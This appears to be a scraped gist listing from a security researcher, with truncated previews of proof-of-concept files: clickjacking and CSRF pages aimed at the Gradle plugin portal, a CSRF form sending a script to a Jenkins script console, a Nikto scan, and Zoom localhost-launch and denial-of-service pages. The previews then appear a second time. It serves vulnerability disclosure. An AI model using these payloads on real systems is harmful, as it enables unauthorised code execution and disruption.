Jonathan Leitschuh JLLeitschuh

## SecurityPlugin.java
package org.jlleitschuh.testing.security;

import org.gradle.api.Plugin;
import org.gradle.api.Project;

public class SecurityPlugin implements Plugin<Project> {
    @Override
    public void apply(final Project target) {
        target.getLogger().lifecycle("A security plugin. I'm malicious!");
    }

## build.gradle.kts
buildscript {
    repositories {
        gradlePluginPortal()
    }
    dependencies {
        /*
         * In practice, this attack could have been leveraged against any plugin on
         * the Gradle plugin portal.
         * I created my own plugin for testing purposes.
         */

## Nikto Gradle Plugin Portal
nikto -h https://plugins.gradle.org/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          104.16.174.166
+ Target Hostname:    plugins.gradle.org
+ Target Port:        443
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=ssl473435.cloudflaressl.com
                   Altnames: ssl473435.cloudflaressl.com, *.gradle.org, gradle.org
                   Ciphers:  ECDHE-ECDSA-CHACHA20-POLY1305

## plugin-portal-clickjack.html
<html>
<head>
    <style>
        iframe { /* iframe from the victim site */
            width: 400px;
            height: 100px;
            position: absolute;
            top: 0;
            left: -20px;
            opacity: 0.5; /* in real opacity:0 */

## plugin-portal-csrf.html
<?xml version="1.0" encoding="UTF-8"?>
<html>
  <head></head>
  <body>
    <form action="https://plugins.gradle.org/user" method="POST" class="edit-profile-form" _lpchecked="1">
      <dl id="name_field">
        <dt>
          <label for="name"></label>
        </dt>
        <dd>

## jenkins-csrf.html
<html>
  <body>
    <form action="http://corperate-jenkins.lab.com:8080/script" method="POST">
      <input type="hidden" name="script"
             value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/>
      <input type="submit" value="Submit!"/>
    </form>
  </body>
</html>

## UploadToArtifactory.kt
/* ****************************************************************************** */
// MIT License
//
// Copyright (c) 2019 Hewlett Packard Enterprise Development LP
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is

## zoom_simple.txt
http://localhost:19421/launch?action=join&confno=[some confrence number]

## zoom_poc_iframe.html
<iframe src="https://zoom.us/j/492468757"/>

## zoom_poc_dos.html
<body>
<script>
// It's actually better if this number isn't a valid zoom number.
var attackNumber = "694138052"

setInterval(function(){
  var image = document.createElement("img");
  // Use a date to bust the browser's cache
  var date = new Date();
  image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();
	package org.jlleitschuh.testing.security;

	import org.gradle.api.Plugin;
	import org.gradle.api.Project;

	public class SecurityPlugin implements Plugin<Project> {
	@Override
	public void apply(final Project target) {
	target.getLogger().lifecycle("A security plugin. I'm malicious!");
	}
	buildscript {
	repositories {
	gradlePluginPortal()
	}
	dependencies {
	/*
	* In practice, this attack could have been leveraged against any plugin on
	* the Gradle plugin portal.
	* I created my own plugin for testing purposes.
	*/
	nikto -h https://plugins.gradle.org/
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP: 104.16.174.166
	+ Target Hostname: plugins.gradle.org
	+ Target Port: 443
	---------------------------------------------------------------------------
	+ SSL Info: Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=ssl473435.cloudflaressl.com
	Altnames: ssl473435.cloudflaressl.com, *.gradle.org, gradle.org
	Ciphers: ECDHE-ECDSA-CHACHA20-POLY1305
	<html>
	<head>
	<style>
	iframe { /* iframe from the victim site */
	width: 400px;
	height: 100px;
	position: absolute;
	top: 0;
	left: -20px;
	opacity: 0.5; /* in real opacity:0 */
	<?xml version="1.0" encoding="UTF-8"?>
	<html>
	<head></head>
	<body>
	<form action="https://plugins.gradle.org/user" method="POST" class="edit-profile-form" _lpchecked="1">
	<dl id="name_field">
	<dt>
	<label for="name"></label>
	</dt>
	<dd>
	<html>
	<body>
	<form action="http://corperate-jenkins.lab.com:8080/script" method="POST">
	<input type="hidden" name="script"
	value="println 'Hello! I just ran an arbitrary bit of code on Jenkins!'; println Jenkins.instance.slaves"/>
	<input type="submit" value="Submit!"/>
	</form>
	</body>
	</html>
	/* ****************************************************************************** */
	// MIT License
	//
	// Copyright (c) 2019 Hewlett Packard Enterprise Development LP
	//
	// Permission is hereby granted, free of charge, to any person obtaining a copy
	// of this software and associated documentation files (the "Software"), to deal
	// in the Software without restriction, including without limitation the rights
	// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
	// copies of the Software, and to permit persons to whom the Software is
	<body>
	<script>
	// It's actually better if this number isn't a valid zoom number.
	var attackNumber = "694138052"

	setInterval(function(){
	var image = document.createElement("img");
	// Use a date to bust the browser's cache
	var date = new Date();
	image.src = "http://localhost:19421/launch?action=join&confno=" + attackNumber + "&" + date.getTime();